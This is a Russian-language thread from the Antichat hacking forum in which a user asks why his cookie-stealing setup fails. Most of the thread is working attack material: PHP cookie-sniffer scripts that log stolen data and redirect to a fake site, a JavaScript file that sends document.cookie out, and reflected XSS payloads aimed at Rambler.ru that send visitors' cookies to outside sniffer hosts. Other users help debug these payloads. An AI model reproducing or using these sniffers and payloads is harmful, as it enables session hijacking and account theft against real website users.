Форум АНТИЧАТ - Отправка cookies на сниффер?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)

- - Отправка cookies на сниффер? (https://forum.antichat.xyz/showthread.php?t=158312)

Отправка cookies на сниффер?

Доброго времени суток. Прошу помочь советом? Я использую браузер Mozilla Firefox. Так вот проблема в том что я не могу отправить куки на сниффер. Начну попорядку.

1. У меня есть свой хост с поддержкой PHP но без поддержки .htaccess. Это: http://www.wallst.ru. На него я залил свой скрипт. Вот исходный код:
<?php

$log="log.txt";
$file=fopen($log,"a+");

$RZ="_";
$Date=date("d:m:Y");
$Time=date("H:i");
$IP=$_SERVER['REMOTE_ADDR'];
$QS=$_SERVER['QUERY_STRING'];
fputs($file,$Date.$RZ.$Time.$RZ.$IP.$RZ.$QS."\n");
fclose($file);
?>
Скрипт в формате php так как htaccess не поддерживается. Права на файл сниффера и на текстовый файл log.txt я выставил 777.

2. Захотел проверить работу сниффера... Нашел пассивную XSS уязвимость в Рамблер.ру. Пишу запрос в строку браузера на вывод моих cookies через функцию alert().
http://........./.........?="><script>alert(document .cookie)</script>. Выводятся мои плюшки...:). Все нормульки. Но если написать запрос на отправку кук на мой сниффер, то на него абсолютно ничего не приходит, запрос пишу вод так:
http://........./.........?=<script>img = new Image(); img.src ="http://sniffer.ru/sniffer.php?"+document.cookie;</script>
Тоесть я предпологаю что все что находится после "?"
будет отправлено в QUERY_STRING(так должно быть).
Пробывал и так:
http://........./.........?=<script>document.location.replace('http :sniffer.ru
sniffer.php?'+document.cookie);</script>, тоже ничего.

Огромная просьба исравить что не так. Может код сниффера, может запрос, я не могу понять, уже всю голову изломал. Удалил нафиг фаервол, антивирь, все что связано с защитой, пробовал реалезовать в Опере тоже самое. Прозьба дать дельный совет...

Вобще валлст хоть русский,но не советую его
Попробуй на freehostia.com

я пользовался таким сниффером.
три файла

log.php
содержимое

PHP код:


		
			
<?PHP 

$Cookies = UrlDecode(getenv("QUERY_STRING")); 

$Date = date("d-m-y H:i:s", time()); 

$browser = getenv("HTTP_USER_AGENT"); 

$ref = getenv("HTTP_REFERER");    

$ip = getenv("REMOTE_ADDR"); 



$text = "

$Cookies: 

$Date: 

$browser: 

$ref: 

$ip:"; 



$filelog = fopen("base.php","a+"); 

fwrite($filelog,"\n $text \n");

fclose($filelog); 

header('Location: http://www.адреc_фейка.ru');  

?>

js.js
содержимое

PHP код:


		
			
var concat = function()

{

var args = Array.prototype.slice.call(arguments);

return args.join("");

}



a = "/log.php?";

b = document.cookie;

location.href = concat(a, b);

base.php - файл базы

Вставка сниффера
http://........./.........?"><script src="http://sniffer.ru/js.js"></script>

Не парся,и юзай online-sniffer.ru

satana-fu, попробую использовать такой... но не думаю что беда в снифаке, я немогу понять почему они не отправляются..
Батхед - мне бы беспланый хостинг с php и htaccess, но я думая что такового не существует в сущности....:).
попробывал он-лайн сниффер.
даю такой запрос но ничего не приходит......:((
http://rambler.ru?c=<script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>.
Почему? Как через Оперу так и через Мозиллу....... Помогите?...:(

скинь в личку ссыль с ксс, попробую разобраться

Главное время запроса и ip с рефером на на мой личный сниффер приходят вод так:
22:11:2009_14:37_а.й.п.и_....(айпи скрыл), а вот куки нет.....
Подскажите в чем трабла, плиз..

satana-fu, с твои скриптом хоть что-то стало работать, теперь куки выводятся мне в адресную строку браузера, что делать?

Цитата:

даю такой запрос но ничего не приходит......(
http://rambler.ru?c=<script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>.

тогда уж делай так чтоле http://rambler.ru?"><script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>

ReduKToR, ни так ни так, не катит....